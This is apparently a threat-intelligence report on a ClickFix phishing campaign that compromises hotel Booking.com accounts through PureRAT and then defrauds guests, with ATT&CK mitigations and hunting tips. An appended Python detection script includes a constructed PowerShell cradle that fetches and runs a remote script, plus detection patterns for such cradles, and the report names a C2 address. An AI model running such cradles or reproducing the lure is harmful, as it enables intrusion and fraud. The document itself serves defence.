ClickFix
Sophisticated phishing campaign compromises hotel Booking.com accounts, enabling...
The "I Paid Twice" campaign represents a paradigm shift in cybercriminal operations, moving from broad phishing to a targeted, multi-faceted attack on the digital trust chain within the hospitality industry. This report provides a forensic-level dissection of the attack lifecycle, from initial social engineering to final monetization.
By examining the interplay of the **ClickFix social engineering technique**, the **PureRAT malware-as-a-service (MaaS) platform**, and a specialized criminal underground economy, this Threatfeed illuminates the technical nuances that make the campaign both highly effective and resilient.
## **Attack Ecosystem**
The campaign is not a singular attack but a **criminal enterprise** with distinct, specialized roles. It systematically targets hotels to compromise their Booking.com accounts, subsequently using that access to defraud customers. The technical execution reveals a high degree of professionalism, leveraging known techniques in novel combinations.
* **Primary Vector:** Spear-phishing against hotel staff.
* **Key Malware:** PureRAT, a .NET-based Remote Access Trojan.
* **Monetization Method:** Business Email Compromise (BEC)-style fraud against hotel guests.
* **Ecosystem Support:** Underground markets for credentials, malware distribution, and verification tools.
## **Dissection of the Attack Chain**
The attack can be segmented into four distinct, interconnected phases, as illustrated below, forming a complete cyber kill chain.
```mermaid
flowchart TD
subgraph A [Phase 1: Initial Compromise]
direction LR
A1[Spear-phishing Email] --> A2[Redirection Chain TDS] --> A3[ClickFix Lure]
end
subgraph B [Phase 2: Malware Deployment]
direction LR
B1[PowerShell Execution] --> B2[Reconnaissance] --> B3[Persistence &<br>DLL Side-Loading]
end
subgraph C [Phase 3: Persistence & C2]
C1[PureRAT MaaS] --> C2[C2 Communication]
end
subgraph D [Phase 4: Monetization]
direction LR
D1[Credential Theft] --> D2[Guest Fraud]
end
A --> B --> C --> D
```
### **Initial Compromise & ClickFix Lure**
This phase relies entirely on sophisticated social engineering to induce user-initiated code execution.
* **Weaponized Communication:**
* **Source:** Emails originate from previously compromised, legitimate email accounts of other hotels, bypassing reputation-based filters.
* **Lure Content:** Impersonates Booking.com with subjects like "New guest message about reservation – Tracking code: [Unique ID]". This creates a sense of urgency and legitimacy.
* **Traffic Distribution System (TDS):**
* The link within the email does not point directly to the payload. It leads to a redirection chain. Analysis shows the initial domain uses JavaScript to check the `window.self !== window.top` condition, forcing a navigation if loaded in an iframe. This anti-analysis technique helps evade sandboxed environments.
* This TDS infrastructure, potentially a paid service, obscures the final payload URL and provides resilience against takedowns.
* **The ClickFix Technique (Core Innovation):**
* The final landing page is a highly convincing clone of a Booking.com login portal, complete with branding.
* A fake CAPTCHA is presented. The critical element is a JavaScript function that automatically copies a malicious PowerShell command to the victim's clipboard upon loading the page.
* The user is then instructed (via on-screen text) to press `Win + R`, paste the command, and press Enter. This technique is highly effective because it:
1. **Bypasses Email Filters:** No malicious attachment is sent.
2. **Exploits User Trust:** The request appears to be a legitimate troubleshooting step.
3. **Achieves Code Execution:** It directly leverages the user's authority to run system commands.
### **Malware Deployment & Persistence**
The execution of the pasted command initiates an automated, fileless deployment sequence.
1. **Scripted Payload Retrieval:**
* The initial PowerShell command is a download cradle that fetches a second, more complex PowerShell script from the attacker's server.
* This secondary script performs reconnaissance, collecting system data (Hostname, Username, OS, AV product) and exfiltrating it to the C2 server.
2. **Payload Delivery and Composition:**
* The script then downloads a ZIP archive containing:
* One legitimate, signed executable (e.g., `libcef.dll` or `AudioSession.exe`).
* Three malicious DLLs.
* The files are extracted to a user-writable directory, typically `%AppData%\Local`.
3. **Persistence and Execution Mechanism:**
* **Persistence:** Established via a Run Registry Key and a shortcut in the Startup folder.
* **DLL Side-Loading:** The legitimate executable is vulnerable to DLL hijacking. When executed, it attempts to load a required DLL from its local directory. Instead, it loads the malicious DLL placed there by the attacker.
* **Fileless Loading:** The malicious DLL acts as a loader, which then reflectively loads the PureRAT payload directly into memory. This avoids writing the primary malware binary to disk, evading signature-based detection.
### **Command and Control with PureRAT**
PureRAT is a fully-featured MaaS platform, providing the attackers with deep and persistent access.
* **Core Capabilities:** The RAT provides a comprehensive suite of spying and control functions, including:
* Remote Desktop Control (VNC-like)
* Keylogging and File System Management
* Webcam and Microphone Capture
* Traffic Proxying (enabling attackers to use the victim's network)
* Data Exfiltration
* **Modular Architecture:** PureRAT uses a plugin system. The core agent can be instructed by the C2 server to download and execute additional modules, such as:
* `PluginRemoteDesktop`
* `PluginExecuting`
* `PluginFileManager`
This modularity makes the malware highly adaptable.
* **Communication and Obfuscation:**
* **C2 Protocol:** Communication with the C2 server (e.g., `45[.]142[.]166[.]73:56001`) is conducted over **encrypted TLS sockets**, blending with normal web traffic.
* **Fingerprinting:** Upon connection, the RAT transmits a detailed system fingerprint to the C2.
* **Obfuscation:** The PureRAT payload is protected by **.NET Reactor**, a commercial obfuscator that complicates static analysis and reverse engineering.
### **The "I Paid Twice" Fraud**
With persistent access, the attackers shift to their primary financial goal.
* **Credential Harvesting:** Using keyloggers, memory dumpers, or simply browsing stolen files, attackers harvest credentials for the hotel's Booking.com extranet portal.
* **The Fraudulent Act:**
* Attackers access the portal using stolen cookies or credentials to view genuine, upcoming reservations.
* They impersonate the hotel and contact guests via **WhatsApp or email**, often just before check-in.
* The message claims a "problem with the bank" or a "security issue" and urges the guest to confirm their payment by wiring funds to a new, attacker-controlled bank account.
* The use of legitimate guest and reservation details makes the scam highly convincing, leading to victims paying twice.
## **Underlying Criminal Infrastructure**
The campaign's efficiency stems from a professionalized cybercrime ecosystem.
* **Credential Markets:** Stolen Booking.com credentials are sold on underground forums like **LolzTeam**. Listings are detailed, including the number of views, last login, and price (typically $50-$500).
* **Verification Tools:** "Log checkers" are sold as services (e.g., ~$40) to automatically verify the validity of stolen credentials through proxies, ensuring they are valuable before purchase.
* **Malware Distribution:** The initial infection is potentially carried out by specialized actors known as "traffers" who are paid for successful installations.
## **A Multi-Layered Strategy**
Defense requires a focus on the specific techniques used at each stage of the attack.
**Table 1: MITRE ATT&CK Mapping and Mitigations**
| Phase | Tactic | Technique (ID) | Mitigation Strategy |
| :--- | :--- | :--- | :--- |
| **Initial Access** | Phishing [T1566] | Spear-phishing Link [T1566.002] | **User Training:** Drill the "Never copy-paste & run commands" rule. Use email security that rewrites/checks URLs in real-time. |
| **Execution** | Execution [T1059] | PowerShell [T1059.001] | **Restrict PowerShell:** Enforce Constrained Language Mode. Enable ScriptBlock logging. Use AMSI. |
| **Persistence** | Persistence [T1547] | Registry Run Keys [T1547.001] | **Endpoint Protection:** Use EDR/NGAV to monitor for registry modifications and DLL side-loading patterns. |
| **Defense Evasion** | Defense Evasion [T1574] | DLL Side-Loading [T1574.002] | **Application Control:** Implement application whitelisting (e.g., AppLocker, WDAC). |
| **C2 & Exfiltration** | Command & Control [T1071] | Application Layer Protocol (TLS) [T1071.001] | **Network Monitoring:** Monitor for anomalous outbound connections to rare ports (5600X). Use SSL/TLS inspection where policy allows. |
| **Impact** | Impact (Financial Theft [T1657]) | Fraudulent Transactions [T1656] | **Process & Policy:** Mandate multi-factor authentication (MFA) on all booking platform accounts. Educate customers to only pay through official, secure channels. |
### **Proactive Hunting Tips:**
* **Hunt for ClickFix:** Search for PowerShell commands with parameters like `-win normal -enc` (a base64 encoded command) in command-line logs.
* **Hunt for PureRAT:** Look for network connections on ports 56001-56003 and processes with names like `AudioSession.exe` making suspicious network calls.
* **Monitor for Persistence:** Audit Run keys and Startup folder contents for unexpected entries.
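The three hunting tips above turned into a small triage script, as an added example that is not part of this Threatfeed: it runs over constructed sample telemetry (the `type|key=value|...` line format, the `example.invalid` URL and all field names are assumptions), decodes the `-enc` argument so the download cradle can be inspected in plaintext, and flags the PureRAT port range, the side-loading host making network calls, and a Run key value pointing into a user-writable directory.

```python
import base64
import re
def encode_ps(cmd: str) -> str:  # PowerShell -EncodedCommand takes base64 of UTF-16LE text
    return base64.b64encode(cmd.encode("utf-16-le")).decode()

# Constructed sample telemetry (hypothetical, not from the report): "type|key=value|..." lines.
STAGE2 = "iwr http://example.invalid/stage2.ps1 | iex"   # constructed cradle text
SAMPLE_EVENTS = [
    "process|image=powershell.exe|cmdline=powershell.exe -win normal -enc " + encode_ps(STAGE2),
    "process|image=powershell.exe|cmdline=powershell.exe -File C:\\ops\\backup.ps1",
    "network|image=AudioSession.exe|dst=192.0.2.7|dport=56001",
    "network|image=chrome.exe|dst=192.0.2.8|dport=443",
    "registry|key=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run|value=AudioSession|data=C:\\Users\\u\\AppData\\Local\\AudioSession.exe",
]

ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
CRADLE_RE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I)

def parse(line: str) -> dict:
    kind, *fields = line.split("|")
    ev = dict(f.split("=", 1) for f in fields)   # first '=' only, so base64 padding survives
    ev["type"] = kind
    return ev

def decode_encoded_command(cmdline: str):  # plaintext of the -enc argument, or None
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # truncated or non-base64 argument
        return None

def analyze(ev: dict) -> list:  # the report's three hunting rules applied to one event
    hits = []
    if ev["type"] == "process" and ev.get("image", "").lower() == "powershell.exe":
        decoded = decode_encoded_command(ev.get("cmdline", ""))
        if decoded and CRADLE_RE.search(decoded):   # encoded command that fetches/runs remote code
            hits.append("clickfix_cradle: " + decoded)
    elif ev["type"] == "network":
        if int(ev.get("dport", 0)) in range(56001, 56004):   # 56001-56003 from the hunting tips
            hits.append(f"purerat_port:{ev['dst']}:{ev['dport']}")
        if ev.get("image", "").lower() == "audiosession.exe":   # side-loading host making network calls
            hits.append("sideload_host_network:" + ev["image"])
    elif ev["type"] == "registry" and ev.get("key", "").lower().endswith("\\currentversion\\run"):
        if "appdata" in ev.get("data", "").lower():   # Run value pointing into a user-writable dir
            hits.append("run_key_appdata:" + ev["value"])
    return hits
def hunt(lines) -> list:   # (event type, finding) pairs over all lines
    return [(ev["type"], h) for ev in map(parse, lines) for h in analyze(ev)]
```

Real deployments would feed `hunt()` from Sysmon event 1/3/13 or Windows event 4688 exports instead of the constructed list.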
The "I Paid Twice" campaign is a potent reminder that modern cyber threats are complex, service-driven businesses. Its technical sophistication lies not in zero-day exploits, but in the masterful combination of social engineering ("ClickFix"), robust malware (PureRAT), and a specialized criminal economy. Defense is challenging but achievable through a layered security posture that emphasizes **user awareness**, **strict application control**, **robust endpoint detection and response**, and **enforcement of security policies** like MFA. Continuous threat intelligence regarding the evolving TTPs of such actors is paramount for organizations within the targeted sectors to protect their assets and, crucially, their customers' trust.